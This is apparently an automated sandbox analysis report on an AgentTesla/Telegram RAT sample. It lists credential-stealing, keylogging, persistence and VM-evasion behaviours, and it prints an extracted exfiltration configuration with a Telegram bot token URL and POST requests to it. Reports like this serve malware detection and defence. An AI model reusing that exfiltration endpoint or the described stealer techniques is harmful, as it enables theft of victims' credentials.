Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 830902
MD5: 2ddec3a033a6ded2ec135bb2f3ec897d
SHA1: cb40f86b808c7b7812fff7820dc596d3a78e5760
SHA256: bb4297e1d60fbf0c9670f3a436d3c00993307ccf5bbf9bade4a6ebcb608edd6c
Tags: NETexeMSIL
Infos:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Creates multiple autostart registry keys
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Encrypted powershell cmdline option found
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
May check the online IP address of the machine
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Machine Learning detection for dropped file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Uses a known web browser user agent for HTTP communication
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 35%
Source: file.exe Virustotal: Detection: 44% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe ReversingLabs: Detection: 35%
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Virustotal: Detection: 44% Perma Link
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe ReversingLabs: Detection: 35%
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Joe Sandbox ML: detected
Source: 15.2.Qasvjoldkyh.exe.400000.0.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendMessage?chat_id=6169364705"}
Source: file.exe.6116.4.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendMessage"}
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.237.62.211:443 -> 192.168.2.4:49697 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49698 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.237.62.211:443 -> 192.168.2.4:49700 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49702 version: TLS 1.2
Source: file.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49698 -> 149.154.167.220:443
Source: Traffic Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49702 -> 149.154.167.220:443
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Source: unknown DNS query: name: api.telegram.org
May check the online IP address of the machine
Source: C:\Users\user\Desktop\file.exe DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\file.exe DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\file.exe DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\file.exe DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\file.exe DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\file.exe DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Yara detected Generic Downloader
Source: Yara match File source: 0.2.file.exe.5710000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.file.exe.41b5d50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.390593122.0000000005710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8db29b545d5b5a8Host: api.telegram.orgContent-Length: 972Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8db298ba02c5c53Host: api.telegram.orgContent-Length: 972Expect: 100-continueConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 104.237.62.211 104.237.62.211
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: unknown Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49702
Source: Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C40000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.ipify.org
Source: file.exe, 00000004.00000002.618527573.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.00000000034D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C40000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api4.ipify.org
Source: file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/
Source: file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCert
Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.603231673.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.592591106.0000000004BAF000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.640909685.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
Source: kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrusted
Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.603231673.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.592591106.0000000004BAF000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.640909685.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
Source: file.exe, 00000004.00000003.396945802.00000000010A5000.00000004.00000020.00020000.00000000.sdmp, Qasvjoldkyh.exe, 0000000F.00000002.566195369.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/
Source: file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCert
Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.603231673.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.592591106.0000000004BAF000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.640909685.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
Source: kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrusted
Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.603231673.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.592591106.0000000004BAF000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.640909685.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
Source: kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://james.newtonking.com/projects/json
Source: file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.603231673.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.592591106.0000000004BAF000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.640909685.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.603231673.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.592591106.0000000004BAF000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.640909685.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0O
